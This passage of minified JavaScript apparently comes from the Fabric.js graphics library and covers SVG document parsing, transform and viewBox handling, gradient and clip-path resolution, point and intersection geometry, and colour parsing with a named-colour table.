qe=Ae.indexOf("fill"),De=Ae.indexOf("stroke");Ae="fill",(qe>-1&&De>-1&&De<qe||-1===qe&&De>-1)&&(Ae="stroke")}else{if("href"===Ie||"xlink:href"===Ie||"font"===Ie)return Ae;if("imageSmoothing"===Ie)return"optimizeQuality"===Ae;Be=He?Ae.map(M):M(Ae,Xe)}}else Ae="";return!He&&isNaN(Be)?Ae:Be}function le(Ie){return new RegExp("^("+Ie.join("|")+")\\b","i")}function z(Ie,Ae){var He,Be,qe,Xe=[];for(Be=0,qe=Ae.length;Be<qe;Be++)He=Ie.getElementsByTagName(Ae[Be]),Xe=Xe.concat(Array.prototype.slice.call(He));return Xe}function v(Ie,Ae){var Ue,Xe=!0;return(Ue=G(Ie,Ae.pop()))&&Ae.length&&(Xe=function P(Ie,Ae){for(var Ue,Xe=!0;Ie.parentNode&&1===Ie.parentNode.nodeType&&Ae.length;)Xe&&(Ue=Ae.pop()),Xe=G(Ie=Ie.parentNode,Ue);return 0===Ae.length}(Ie,Ae)),Ue&&Xe&&0===Ae.length}function G(Ie,Ae){var Be,qe,Ue=Ie.nodeName,Xe=Ie.getAttribute("class"),He=Ie.getAttribute("id");if(Be=new RegExp("^"+Ue,"i"),Ae=Ae.replace(Be,""),He&&Ae.length&&(Be=new RegExp("#"+He+"(?![a-zA-Z\\-]+)","i"),Ae=Ae.replace(Be,"")),Xe&&Ae.length)for(qe=(Xe=Xe.split(" ")).length;qe--;)Be=new RegExp("\\."+Xe[qe]+"(?![a-zA-Z\\-]+)","i"),Ae=Ae.replace(Be,"");return 0===Ae.length}function X(Ie,Ae){var Ue;if(Ie.getElementById&&(Ue=Ie.getElementById(Ae)),Ue)return Ue;var Xe,He,Be,qe=Ie.getElementsByTagName("*");for(He=0,Be=qe.length;He<Be;He++)if(Ae===(Xe=qe[He]).getAttribute("id"))return Xe}g.svgValidTagNamesRegEx=le(["path","circle","polygon","polyline","ellipse","rect","line","image","text"]),g.svgViewBoxElementsRegEx=le(["symbol","image","marker","pattern","view","svg"]),g.svgInvalidAncestorsRegEx=le(["pattern","defs","symbol","metadata","clipPath","mask","desc"]),g.svgValidParentsRegEx=le(["symbol","g","a","svg","clipPath","defs"]),g.cssRules={},g.gradientDefs={},g.clipPaths={},g.parseTransformAttribute=function(){function Ue(ft,xe,We){ft[We]=Math.tan(g.util.degreesToRadians(xe[0]))}var He=g.iMatrix,Be=g.reNum,qe=g.commaWsp,Ge="(?:(?:(matrix)\\s*\\(\\s*("+Be+")"+qe+"("+Be+")"+qe+"("+Be+")"+qe+"("+Be+")"+qe+"("+Be+")"+qe+"("+Be+")\\s*\\))|(?:(translate)\\s*\\(\\s*("+Be+")(?:"+qe+"("+Be+"))?\\s*\\))|(?:(scale)\\s*\\(\\s*("+Be+")(?:"+qe+"("+Be+"))?\\s*\\))|(?:(rotate)\\s*\\(\\s*("+Be+")(?:"+qe+"("+Be+")"+qe+"("+Be+"))?\\s*\\))|(?:(skewX)\\s*\\(\\s*("+Be+")\\s*\\))|(?:(skewY)\\s*\\(\\s*("+Be+")\\s*\\)))",mt=new RegExp("^\\s*(?:(?:"+Ge+"(?:"+qe+"*"+Ge+")*)?)\\s*$"),lt=new RegExp(Ge,"g");return function(ft){var xe=He.concat(),We=[];if(!ft||ft&&!mt.test(ft))return xe;ft.replace(lt,function(Oe){var Te=new RegExp(Ge).exec(Oe).filter(function(st){return!!st}),Le=Te[1],$e=Te.slice(2).map(parseFloat);switch(Le){case"translate":!function Xe(ft,xe){ft[4]=xe[0],2===xe.length&&(ft[5]=xe[1])}(xe,$e);break;case"rotate":$e[0]=g.util.degreesToRadians($e[0]),function Ie(ft,xe){var We=g.util.cos(xe[0]),Je=g.util.sin(xe[0]),Oe=0,Te=0;3===xe.length&&(Oe=xe[1],Te=xe[2]),ft[0]=We,ft[1]=Je,ft[2]=-Je,ft[3]=We,ft[4]=Oe-(We*Oe-Je*Te),ft[5]=Te-(Je*Oe+We*Te)}(xe,$e);break;case"scale":!function Ae(ft,xe){var Je=2===xe.length?xe[1]:xe[0];ft[0]=xe[0],ft[3]=Je}(xe,$e);break;case"skewX":Ue(xe,$e,2);break;case"skewY":Ue(xe,$e,1);break;case"matrix":xe=$e}We.push(xe.concat()),xe=He.concat()});for(var Je=We[0];We.length>1;)We.shift(),Je=g.util.multiplyTransformMatrices(Je,We[0]);return Je}}();var h=new RegExp("^\\s*("+g.reNum+"+)\\s*,?\\s*("+g.reNum+"+)\\s*,?\\s*("+g.reNum+"+)\\s*,?\\s*("+g.reNum+"+)\\s*$");function R(Ie){if(!g.svgViewBoxElementsRegEx.test(Ie.nodeName))return{};var He,Be,qe,De,Ve,ze,Ae=Ie.getAttribute("viewBox"),Ue=1,Xe=1,me=Ie.getAttribute("width"),Ke=Ie.getAttribute("height"),rt=Ie.getAttribute("x")||0,Ge=Ie.getAttribute("y")||0,Qe=Ie.getAttribute("preserveAspectRatio")||"",ht=!Ae||!(Ae=Ae.match(h)),mt=!me||!Ke||"100%"===me||"100%"===Ke,lt=ht&&mt,ft={},xe="",We=0,Je=0;if(ft.width=0,ft.height=0,ft.toBeParsed=lt,ht&&(rt||Ge)&&Ie.parentNode&&"#document"!==Ie.parentNode.nodeName&&(xe=" translate("+M(rt)+" "+M(Ge)+") ",Ve=(Ie.getAttribute("transform")||"")+xe,Ie.setAttribute("transform",Ve),Ie.removeAttribute("x"),Ie.removeAttribute("y")),lt)return ft;if(ht)return ft.width=M(me),ft.height=M(Ke),ft;if(He=-parseFloat(Ae[1]),Be=-parseFloat(Ae[2]),qe=parseFloat(Ae[3]),De=parseFloat(Ae[4]),ft.minX=He,ft.minY=Be,ft.viewBoxWidth=qe,ft.viewBoxHeight=De,mt?(ft.width=qe,ft.height=De):(ft.width=M(me),ft.height=M(Ke),Ue=ft.width/qe,Xe=ft.height/De),"none"!==(Qe=g.util.parsePreserveAspectRatioAttribute(Qe)).alignX&&("meet"===Qe.meetOrSlice&&(Xe=Ue=Ue>Xe?Xe:Ue),"slice"===Qe.meetOrSlice&&(Xe=Ue=Ue>Xe?Ue:Xe),We=ft.width-qe*Ue,Je=ft.height-De*Ue,"Mid"===Qe.alignX&&(We/=2),"Mid"===Qe.alignY&&(Je/=2),"Min"===Qe.alignX&&(We=0),"Min"===Qe.alignY&&(Je=0)),1===Ue&&1===Xe&&0===He&&0===Be&&0===rt&&0===Ge)return ft;if((rt||Ge)&&"#document"!==Ie.parentNode.nodeName&&(xe=" translate("+M(rt)+" "+M(Ge)+") "),Ve=xe+" matrix("+Ue+" 0 0 "+Xe+" "+(He*Ue+We)+" "+(Be*Xe+Je)+") ","svg"===Ie.nodeName){for(ze=Ie.ownerDocument.createElementNS(g.svgNS,"g");Ie.firstChild;)ze.appendChild(Ie.firstChild);Ie.appendChild(ze)}else(ze=Ie).removeAttribute("x"),ze.removeAttribute("y"),Ve=ze.getAttribute("transform")+Ve;return ze.setAttribute("transform",Ve),ft}function Z(Ie,Ae){var Xe="xlink:href",Be=X(Ie,Ae.getAttribute(Xe).slice(1));if(Be&&Be.getAttribute(Xe)&&Z(Ie,Be),["gradientTransform","x1","x2","y1","y2","gradientUnits","cx","cy","r","fx","fy"].forEach(function(De){Be&&!Ae.hasAttribute(De)&&Be.hasAttribute(De)&&Ae.setAttribute(De,Be.getAttribute(De))}),!Ae.children.length)for(var qe=Be.cloneNode(!0);qe.firstChild;)Ae.appendChild(qe.firstChild);Ae.removeAttribute(Xe)}g.parseSVGDocument=function(Ie,Ae,Ue,Xe){if(Ie){!function L(Ie){for(var Ae=z(Ie,["use","svg:use"]),Ue=0;Ae.length&&Ue<Ae.length;){var Xe=Ae[Ue],He=Xe.getAttribute("xlink:href")||Xe.getAttribute("href");if(null===He)return;var rt,Ge,Qe,ht,Be=He.slice(1),qe=Xe.getAttribute("x")||0,De=Xe.getAttribute("y")||0,Ve=X(Ie,Be).cloneNode(!0),ze=(Ve.getAttribute("transform")||"")+" translate("+qe+", "+De+")",Ke=Ae.length,mt=g.svgNS;if(R(Ve),/^svg$/i.test(Ve.nodeName)){var lt=Ve.ownerDocument.createElementNS(mt,"g");for(Ge=0,ht=(Qe=Ve.attributes).length;Ge<ht;Ge++)rt=Qe.item(Ge),lt.setAttributeNS(mt,rt.nodeName,rt.nodeValue);for(;Ve.firstChild;)lt.appendChild(Ve.firstChild);Ve=lt}for(Ge=0,ht=(Qe=Xe.attributes).length;Ge<ht;Ge++)"x"!==(rt=Qe.item(Ge)).nodeName&&"y"!==rt.nodeName&&"xlink:href"!==rt.nodeName&&"href"!==rt.nodeName&&("transform"===rt.nodeName?ze=rt.nodeValue+" "+ze:Ve.setAttribute(rt.nodeName,rt.nodeValue));Ve.setAttribute("transform",ze),Ve.setAttribute("instantiated_by_use","1"),Ve.removeAttribute("id"),Xe.parentNode.replaceChild(Ve,Xe),Ae.length===Ke&&Ue++}}(Ie);var Be,qe,He=g.Object.__uid++,De=R(Ie),Ve=g.util.toArray(Ie.getElementsByTagName("*"));if(De.crossOrigin=Xe&&Xe.crossOrigin,De.svgUid=He,0===Ve.length&&g.isLikelyNode){var ze=[];for(Be=0,qe=(Ve=Ie.selectNodes('//*[name(.)!="svg"]')).length;Be<qe;Be++)ze[Be]=Ve[Be];Ve=ze}var me=Ve.filter(function(rt){return R(rt),g.svgValidTagNamesRegEx.test(rt.nodeName.replace("svg:",""))&&!function J(Ie,Ae){for(;Ie&&(Ie=Ie.parentNode);)if(Ie.nodeName&&Ae.test(Ie.nodeName.replace("svg:",""))&&!Ie.getAttribute("instantiated_by_use"))return!0;return!1}(rt,g.svgInvalidAncestorsRegEx)});if(!me||me&&!me.length)return void(Ae&&Ae([],{}));var Ke={};Ve.filter(function(rt){return"clipPath"===rt.nodeName.replace("svg:","")}).forEach(function(rt){var Ge=rt.getAttribute("id");Ke[Ge]=g.util.toArray(rt.getElementsByTagName("*")).filter(function(Qe){return g.svgValidTagNamesRegEx.test(Qe.nodeName.replace("svg:",""))})}),g.gradientDefs[He]=g.getGradientDefs(Ie),g.cssRules[He]=g.getCSSRules(Ie),g.clipPaths[He]=Ke,g.parseElements(me,function(rt,Ge){Ae&&(Ae(rt,De,Ge,Ve),delete g.gradientDefs[He],delete g.cssRules[He],delete g.clipPaths[He])},_(De),Ue,Xe)}};var ue=new RegExp("(normal|italic)?\\s*(normal|small-caps)?\\s*(normal|bold|bolder|lighter|100|200|300|400|500|600|700|800|900)?\\s*("+g.reNum+"(?:px|cm|mm|em|pt|pc|in)*)(?:\\/(normal|"+g.reNum+"))?\\s+(.*)");b(g,{parseFontDeclaration:function(Ie,Ae){var Ue=Ie.match(ue);if(Ue){var Xe=Ue[1],He=Ue[3],Be=Ue[4],qe=Ue[5],De=Ue[6];Xe&&(Ae.fontStyle=Xe),He&&(Ae.fontWeight=isNaN(parseFloat(He))?He:parseFloat(He)),Be&&(Ae.fontSize=M(Be)),De&&(Ae.fontFamily=De),qe&&(Ae.lineHeight="normal"===qe?1:qe)}},getGradientDefs:function(Ie){var Xe,Ue=z(Ie,["linearGradient","radialGradient","svg:linearGradient","svg:radialGradient"]),He=0,Be={};for(He=Ue.length;He--;)(Xe=Ue[He]).getAttribute("xlink:href")&&Z(Ie,Xe),Be[Xe.getAttribute("id")]=Xe;return Be},parseAttributes:function(Ie,Ae,Ue){if(Ie){var Xe,Be,qe,He={};void 0===Ue&&(Ue=Ie.getAttribute("svgUid")),Ie.parentNode&&g.svgValidParentsRegEx.test(Ie.parentNode.nodeName)&&(He=g.parseAttributes(Ie.parentNode,Ae,Ue));var De=Ae.reduce(function(Qe,ht){return(Xe=Ie.getAttribute(ht))&&(Qe[ht]=Xe),Qe},{}),Ve=b(function A(Ie,Ae){var Ue={};for(var Xe in g.cssRules[Ae])if(v(Ie,Xe.split(" ")))for(var He in g.cssRules[Ae][Xe])Ue[He]=g.cssRules[Ae][Xe][He];return Ue}(Ie,Ue),g.parseStyleAttribute(Ie));De=b(De,Ve),Ve[ee]&&Ie.setAttribute(ee,Ve[ee]),Be=qe=He.fontSize||g.Text.DEFAULT_SVG_FONT_SIZE,De[K]&&(De[K]=Be=M(De[K],qe));var ze,me,Ke={};for(var rt in De)me=ve(ze=se(rt),De[rt],He,Be),Ke[ze]=me;Ke&&Ke.font&&g.parseFontDeclaration(Ke.font,Ke);var Ge=b(He,Ke);return g.svgValidParentsRegEx.test(Ie.nodeName)?Ge:function ye(Ie){for(var Ae in U)if(void 0!==Ie[U[Ae]]&&""!==Ie[Ae]){if(void 0===Ie[Ae]){if(!g.Object.prototype[Ae])continue;Ie[Ae]=g.Object.prototype[Ae]}if(0!==Ie[Ae].indexOf("url(")){var Ue=new g.Color(Ie[Ae]);Ie[Ae]=Ue.setAlpha(y(Ue.getAlpha()*Ie[U[Ae]],2)).toRgba()}}return Ie}(Ge)}},parseElements:function(Ie,Ae,Ue,Xe,He){new g.ElementsParser(Ie,Ae,Ue,Xe,He).parse()},parseStyleAttribute:function(Ie){var Ae={},Ue=Ie.getAttribute("style");return Ue&&("string"==typeof Ue?function l(Ie,Ae){var Ue,Xe;Ie.replace(/;\s*$/,"").split(";").forEach(function(He){var Be=He.split(":");Ue=Be[0].trim().toLowerCase(),Xe=Be[1].trim(),Ae[Ue]=Xe})}(Ue,Ae):function f(Ie,Ae){for(var He in Ie)void 0!==Ie[He]&&(Ae[He.toLowerCase()]=Ie[He])}(Ue,Ae)),Ae},parsePointsAttribute:function(Ie){if(!Ie)return null;var Ue,Xe,Ae=[];for(Ue=0,Xe=(Ie=(Ie=Ie.replace(/,/g," ").trim()).split(/\s+/)).length;Ue<Xe;Ue+=2)Ae.push({x:parseFloat(Ie[Ue]),y:parseFloat(Ie[Ue+1])});return Ae},getCSSRules:function(Ie){var Ue,Xe,Ae=Ie.getElementsByTagName("style"),He={};for(Ue=0,Xe=Ae.length;Ue<Xe;Ue++){var qe=Ae[Ue].textContent;""!==(qe=qe.replace(/\/\*[\s\S]*?\*\//g,"")).trim()&&qe.split("}").filter(function(De){return De.trim()}).forEach(function(De){var Ve=De.split("{"),ze={},Ke=Ve[1].trim().split(";").filter(function(ht){return ht.trim()});for(Ue=0,Xe=Ke.length;Ue<Xe;Ue++){var rt=Ke[Ue].split(":"),Ge=rt[0].trim(),Qe=rt[1].trim();ze[Ge]=Qe}(De=Ve[0].trim()).split(",").forEach(function(ht){""!==(ht=ht.replace(/^svg/i,"").trim())&&(He[ht]?g.util.object.extend(He[ht],ze):He[ht]=g.util.object.clone(ze))})})}return He},loadSVGFromURL:function(Ie,Ae,Ue,Xe){Ie=Ie.replace(/^\n\s*/,"").trim(),new g.util.request(Ie,{method:"get",onComplete:function He(Be){var qe=Be.responseXML;if(!qe||!qe.documentElement)return Ae&&Ae(null),!1;g.parseSVGDocument(qe.documentElement,function(De,Ve,ze,me){Ae&&Ae(De,Ve,ze,me)},Ue,Xe)}})},loadSVGFromString:function(Ie,Ae,Ue,Xe){var Be=(new g.window.DOMParser).parseFromString(Ie.trim(),"text/xml");g.parseSVGDocument(Be.documentElement,function(qe,De,Ve,ze){Ae(qe,De,Ve,ze)},Ue,Xe)}})}(we),j.ElementsParser=function(E,g,b,_,y,M){this.elements=E,this.callback=g,this.options=b,this.reviver=_,this.svgUid=b&&b.svgUid||0,this.parsingOptions=y,this.regexUrl=/^url\(['"]?#([^'"]+)['"]?\)/g,this.doc=M},function(E){E.parse=function(){this.instances=new Array(this.elements.length),this.numElements=this.elements.length,this.createObjects()},E.createObjects=function(){var g=this;this.elements.forEach(function(b,_){b.setAttribute("svgUid",g.svgUid),g.createObject(b,_)})},E.findTag=function(g){return j[j.util.string.capitalize(g.tagName.replace("svg:",""))]},E.createObject=function(g,b){var _=this.findTag(g);if(_&&_.fromElement)try{_.fromElement(g,this.createCallback(b,g),this.options)}catch(y){j.log(y)}else this.checkIfDone()},E.createCallback=function(g,b){var _=this;return function(y){var M;_.resolveGradient(y,b,"fill"),_.resolveGradient(y,b,"stroke"),y instanceof j.Image&&y._originalElement&&(M=y.parsePreserveAspectRatioAttribute(b)),y._removeTransformMatrix(M),_.resolveClipPath(y,b),_.reviver&&_.reviver(b,y),_.instances[g]=y,_.checkIfDone()}},E.extractPropertyDefinition=function(g,b,_){var y=g[b],M=this.regexUrl;if(M.test(y)){M.lastIndex=0;var p=M.exec(y)[1];return M.lastIndex=0,j[_][this.svgUid][p]}},E.resolveGradient=function(g,b,_){var y=this.extractPropertyDefinition(g,_,"gradientDefs");if(y){var M=b.getAttribute(_+"-opacity"),p=j.Gradient.fromElement(y,g,M,this.options);g.set(_,p)}},E.createClipPathCallback=function(g,b){return function(_){_._removeTransformMatrix(),_.fillRule=_.clipRule,b.push(_)}},E.resolveClipPath=function(g,b){var y,p,D,w,_=this.extractPropertyDefinition(g,"clipPath","clipPaths");if(_){D=[],p=j.util.invertTransform(g.calcTransformMatrix());for(var S=_[0].parentNode,O=b;O.parentNode&&O.getAttribute("clip-path")!==g.clipPath;)O=O.parentNode;O.parentNode.appendChild(S);for(var U=0;U<_.length;U++)this.findTag(y=_[U]).fromElement(y,this.createClipPathCallback(g,D),this.options);_=1===D.length?D[0]:new j.Group(D),w=j.util.multiplyTransformMatrices(p,_.calcTransformMatrix()),_.clipPath&&this.resolveClipPath(_,O);var x=j.util.qrDecompose(w);_.flipX=!1,_.flipY=!1,_.set("scaleX",x.scaleX),_.set("scaleY",x.scaleY),_.angle=x.angle,_.skewX=x.skewX,_.skewY=0,_.setPositionByOrigin({x:x.translateX,y:x.translateY},"center","center"),g.clipPath=_}else delete g.clipPath},E.checkIfDone=function(){0==--this.numElements&&(this.instances=this.instances.filter(function(g){return null!=g}),this.callback(this.instances,this.elements))}}(j.ElementsParser.prototype),function(E){"use strict";var g=E.fabric||(E.fabric={});function b(_,y){this.x=_,this.y=y}g.Point?g.warn("fabric.Point is already defined"):(g.Point=b,b.prototype={type:"point",constructor:b,add:function(_){return new b(this.x+_.x,this.y+_.y)},addEquals:function(_){return this.x+=_.x,this.y+=_.y,this},scalarAdd:function(_){return new b(this.x+_,this.y+_)},scalarAddEquals:function(_){return this.x+=_,this.y+=_,this},subtract:function(_){return new b(this.x-_.x,this.y-_.y)},subtractEquals:function(_){return this.x-=_.x,this.y-=_.y,this},scalarSubtract:function(_){return new b(this.x-_,this.y-_)},scalarSubtractEquals:function(_){return this.x-=_,this.y-=_,this},multiply:function(_){return new b(this.x*_,this.y*_)},multiplyEquals:function(_){return this.x*=_,this.y*=_,this},divide:function(_){return new b(this.x/_,this.y/_)},divideEquals:function(_){return this.x/=_,this.y/=_,this},eq:function(_){return this.x===_.x&&this.y===_.y},lt:function(_){return this.x<_.x&&this.y<_.y},lte:function(_){return this.x<=_.x&&this.y<=_.y},gt:function(_){return this.x>_.x&&this.y>_.y},gte:function(_){return this.x>=_.x&&this.y>=_.y},lerp:function(_,y){return void 0===y&&(y=.5),y=Math.max(Math.min(1,y),0),new b(this.x+(_.x-this.x)*y,this.y+(_.y-this.y)*y)},distanceFrom:function(_){var y=this.x-_.x,M=this.y-_.y;return Math.sqrt(y*y+M*M)},midPointFrom:function(_){return this.lerp(_)},min:function(_){return new b(Math.min(this.x,_.x),Math.min(this.y,_.y))},max:function(_){return new b(Math.max(this.x,_.x),Math.max(this.y,_.y))},toString:function(){return this.x+","+this.y},setXY:function(_,y){return this.x=_,this.y=y,this},setX:function(_){return this.x=_,this},setY:function(_){return this.y=_,this},setFromPoint:function(_){return this.x=_.x,this.y=_.y,this},swap:function(_){var y=this.x,M=this.y;this.x=_.x,this.y=_.y,_.x=y,_.y=M},clone:function(){return new b(this.x,this.y)}})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={});function b(_){this.status=_,this.points=[]}g.Intersection?g.warn("fabric.Intersection is already defined"):(g.Intersection=b,g.Intersection.prototype={constructor:b,appendPoint:function(_){return this.points.push(_),this},appendPoints:function(_){return this.points=this.points.concat(_),this}},g.Intersection.intersectLineLine=function(_,y,M,p){var D,w=(p.x-M.x)*(_.y-M.y)-(p.y-M.y)*(_.x-M.x),x=(y.x-_.x)*(_.y-M.y)-(y.y-_.y)*(_.x-M.x),S=(p.y-M.y)*(y.x-_.x)-(p.x-M.x)*(y.y-_.y);if(0!==S){var O=w/S,U=x/S;0<=O&&O<=1&&0<=U&&U<=1?(D=new b("Intersection")).appendPoint(new g.Point(_.x+O*(y.x-_.x),_.y+O*(y.y-_.y))):D=new b}else D=new b(0===w||0===x?"Coincident":"Parallel");return D},g.Intersection.intersectLinePolygon=function(_,y,M){var S,O,p=new b,D=M.length;for(O=0;O<D;O++)S=b.intersectLineLine(_,y,M[O],M[(O+1)%D]),p.appendPoints(S.points);return p.points.length>0&&(p.status="Intersection"),p},g.Intersection.intersectPolygonPolygon=function(_,y){var D,M=new b,p=_.length;for(D=0;D<p;D++){var S=b.intersectLinePolygon(_[D],_[(D+1)%p],y);M.appendPoints(S.points)}return M.points.length>0&&(M.status="Intersection"),M},g.Intersection.intersectPolygonRectangle=function(_,y,M){var p=y.min(M),D=y.max(M),w=new g.Point(D.x,p.y),x=new g.Point(p.x,D.y),S=b.intersectLinePolygon(p,w,_),O=b.intersectLinePolygon(w,D,_),U=b.intersectLinePolygon(D,x,_),K=b.intersectLinePolygon(x,p,_),ee=new b;return ee.appendPoints(S.points),ee.appendPoints(O.points),ee.appendPoints(U.points),ee.appendPoints(K.points),ee.points.length>0&&(ee.status="Intersection"),ee})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={});function b(y){y?this._tryParsingColor(y):this.setSource([0,0,0,1])}function _(y,M,p){return p<0&&(p+=1),p>1&&(p-=1),p<1/6?y+6*(M-y)*p:p<.5?M:p<2/3?y+(M-y)*(2/3-p)*6:y}g.Color?g.warn("fabric.Color is already defined."):(g.Color=b,g.Color.prototype={_tryParsingColor:function(y){var M;y in b.colorNameMap&&(y=b.colorNameMap[y]),"transparent"===y&&(M=[255,255,255,0]),M||(M=b.sourceFromHex(y)),M||(M=b.sourceFromRgb(y)),M||(M=b.sourceFromHsl(y)),M||(M=[0,0,0,1]),M&&this.setSource(M)},_rgbToHsl:function(y,M,p){var D,w,x,S=g.util.array.max([y/=255,M/=255,p/=255]),O=g.util.array.min([y,M,p]);if(x=(S+O)/2,S===O)D=w=0;else{var U=S-O;switch(w=x>.5?U/(2-S-O):U/(S+O),S){case y:D=(M-p)/U+(M<p?6:0);break;case M:D=(p-y)/U+2;break;case p:D=(y-M)/U+4}D/=6}return[Math.round(360*D),Math.round(100*w),Math.round(100*x)]},getSource:function(){return this._source},setSource:function(y){this._source=y},toRgb:function(){var y=this.getSource();return"rgb("+y[0]+","+y[1]+","+y[2]+")"},toRgba:function(){var y=this.getSource();return"rgba("+y[0]+","+y[1]+","+y[2]+","+y[3]+")"},toHsl:function(){var y=this.getSource(),M=this._rgbToHsl(y[0],y[1],y[2]);return"hsl("+M[0]+","+M[1]+"%,"+M[2]+"%)"},toHsla:function(){var y=this.getSource(),M=this._rgbToHsl(y[0],y[1],y[2]);return"hsla("+M[0]+","+M[1]+"%,"+M[2]+"%,"+y[3]+")"},toHex:function(){var M,p,D,y=this.getSource();return M=1===(M=y[0].toString(16)).length?"0"+M:M,p=1===(p=y[1].toString(16)).length?"0"+p:p,D=1===(D=y[2].toString(16)).length?"0"+D:D,M.toUpperCase()+p.toUpperCase()+D.toUpperCase()},toHexa:function(){var M,y=this.getSource();return M=1===(M=(M=Math.round(255*y[3])).toString(16)).length?"0"+M:M,this.toHex()+M.toUpperCase()},getAlpha:function(){return this.getSource()[3]},setAlpha:function(y){var M=this.getSource();return M[3]=y,this.setSource(M),this},toGrayscale:function(){var y=this.getSource(),M=parseInt((.3*y[0]+.59*y[1]+.11*y[2]).toFixed(0),10);return this.setSource([M,M,M,y[3]]),this},toBlackWhite:function(y){var M=this.getSource(),p=(.3*M[0]+.59*M[1]+.11*M[2]).toFixed(0),D=M[3];return y=y||127,p=Number(p)<Number(y)?0:255,this.setSource([p,p,p,D]),this},overlayWith:function(y){y instanceof b||(y=new b(y));var S,M=[],p=this.getAlpha(),w=this.getSource(),x=y.getSource();for(S=0;S<3;S++)M.push(Math.round(.5*w[S]+.5*x[S]));return M[3]=p,this.setSource(M),this}},g.Color.reRGBa=/^rgba?\(\s*(\d{1,3}(?:\.\d+)?\%?)\s*,\s*(\d{1,3}(?:\.\d+)?\%?)\s*,\s*(\d{1,3}(?:\.\d+)?\%?)\s*(?:\s*,\s*((?:\d*\.?\d+)?)\s*)?\)$/i,g.Color.reHSLa=/^hsla?\(\s*(\d{1,3})\s*,\s*(\d{1,3}\%)\s*,\s*(\d{1,3}\%)\s*(?:\s*,\s*(\d+(?:\.\d+)?)\s*)?\)$/i,g.Color.reHex=/^#?([0-9a-f]{8}|[0-9a-f]{6}|[0-9a-f]{4}|[0-9a-f]{3})$/i,g.Color.colorNameMap={aliceblue:"#F0F8FF",antiquewhite:"#FAEBD7",aqua:"#00FFFF",aquamarine:"#7FFFD4",azure:"#F0FFFF",beige:"#F5F5DC",bisque:"#FFE4C4",black:"#000000",blanchedalmond:"#FFEBCD",blue:"#0000FF",blueviolet:"#8A2BE2",brown:"#A52A2A",burlywood:"#DEB887",cadetblue:"#5F9EA0",chartreuse:"#7FFF00",chocolate:"#D2691E",coral:"#FF7F50",cornflowerblue:"#6495ED",cornsilk:"#FFF8DC",crimson:"#DC143C",cyan:"#00FFFF",darkblue:"#00008B",darkcyan:"#008B8B",darkgoldenrod:"#B8860B",darkgray:"#A9A9A9",darkgrey:"#A9A9A9",darkgreen:"#006400",darkkhaki:"#BDB76B",darkmagenta:"#8B008B",darkolivegreen:"#556B2F",darkorange:"#FF8C00",darkorchid:"#9932CC",darkred:"#8B0000",darksalmon:"#E9967A",darkseagreen:"#8FBC8F",darkslateblue:"#483D8B",darkslategray:"#2F4F4F",darkslategrey:"#2F4F4F",darkturquoise:"#00CED1",darkviolet:"#9400D3",deeppink:"#FF1493",deepskyblue:"#00BFFF",dimgray:"#696969",dimgrey:"#696969",dodgerblue:"#1E90FF",firebrick:"#B22222",floralwhite:"#FFFAF0",forestgreen:"#228B22",fuchsia:"#FF00FF",gainsboro:"#DCDCDC",ghostwhite:"#F8F8FF",gold:"#FFD700",goldenrod:"#DAA520",gray:"#808080",grey:"#808080",green:"#008000",greenyellow:"#ADFF2F",honeydew:"#F0FFF0",hotpink:"#FF69B4",indianred:"#CD5C5C",indigo:"#4B0082",ivory:"#FFFFF0",khaki:"#F0E68C",lavender:"#E6E6FA",lavenderblush:"#FFF0F5",lawngreen:"#7CFC00",lemonchiffon:"#FFFACD",lightblue:"#ADD8E6",lightcoral:"#F08080",lightcyan:"#E0FFFF",lightgoldenrodyellow:"#FAFAD2",lightgray:"#D3D3D3",lightgrey:"#D3D3D3",lightgreen:"#90EE90",lightpink:"#FFB6C1",lightsalmon:"#FFA07A",lightseagreen:"#20B2AA",lightskyblue:"#87CEFA",lightslategray:"#778899",lightslategrey:"#778899",lightsteelblue:"#B0C4DE",lightyellow:"#FFFFE0",lime:"#00FF00",limegreen:"#32CD32",linen:"#FAF0E6",magenta:"#FF00FF",maroon:"#800000",mediumaquamarine:"#66CDAA",mediumblue:"#0000CD",mediumorchid:"#BA55D3",mediumpurple:"#9370DB",mediumseagreen:"#3CB371",mediumslateblue:"#7B68EE",mediumspringgreen:"#00FA9A",mediumturquoise:"#48D1CC",mediumvioletred:"#C71585",midnightblue:"#191970",mintcream:"#F5FFFA",mistyrose:"#FFE4E1",moccasin:"#FFE4B5",navajowhite:"#FFDEAD",navy:"#000080",oldlace:"#FDF5E6",olive:"#808000",olivedrab:"#6B8E23",orange:"#FFA500",orangered:"#FF4500",orchid:"#DA70D6",palegoldenrod:"#EEE8AA",palegreen:"#98FB98",paleturquoise:"#AFEEEE",palevioletred:"#DB7093",papayawhip:"#FFEFD5",peachpuff:"#FFDAB9",peru:"#CD853F",pink:"#FFC0CB",plum:"#DDA0DD",powderblue:"#B0E0E6",purple:"#800080",rebeccapurple:"#663399",red:"#FF0000",rosybrown:"#BC8F8F",royalblue:"#4169E1",saddlebrown:"#8B4513",salmon:"#FA8072",sandybrown:"#F4A460",seagreen:"#2E8B57",seashell:"#FFF5EE",sienna:"#A0522D",silver:"#C0C0C0",skyblue:"#87CEEB",slateblue:"#6A5ACD",slategray:"#708090",slategrey:"#708090",snow:"#FFFAFA",springgreen:"#00FF7F",steelblue:"#4682B4",tan:"#D2B48C",teal:"#008080",thistle:"#D8BFD8",tomato:"#FF6347",turquoise:"#40E0D0",violet:"#EE82EE",wheat:"#F5DEB3",white:"#FFFFFF",whitesmoke:"#F5F5F5",yellow:"#FFFF00",yellowgreen:"#9ACD32"},g.Color.fromRgb=function(y){return b.fromSource(b.sourceFromRgb(y))},g.Color.sourceFromRgb=function(y){var M=y.match(b.reRGBa);if(M){var p=parseInt(M[1],10)/(/%$/.test(M[1])?100:1)*(/%$/.test(M[1])?255:1),D=parseInt(M[2],10)/(/%$/.test(M[2])?100:1)*(/%$/.test(M[2])?255:1),w=parseInt(M[3],10)/(/%$/.test(M[3])?100:1)*(/%$/.test(M[3])?255:1);return[parseInt(p,10),parseInt(D,10),parseInt(w,10),M[4]?parseFloat(M[4]):1]}},g.Color.fromRgba=b.fromRgb,g.Color.fromHsl=function(y){return b.fromSource(b.sourceFromHsl(y))},g.Color.sourceFromHsl=function(y){var M=y.match(b.reHSLa);if(M){var x,S,O,p=(parseFloat(M[1])%360+360)%360/360,D=parseFloat(M[2])/(/%$/.test(M[2])?100:1),w=parseFloat(M[3])/(/%$/.test(M[3])?100:1);if(0===D)x=S=O=w;else{var 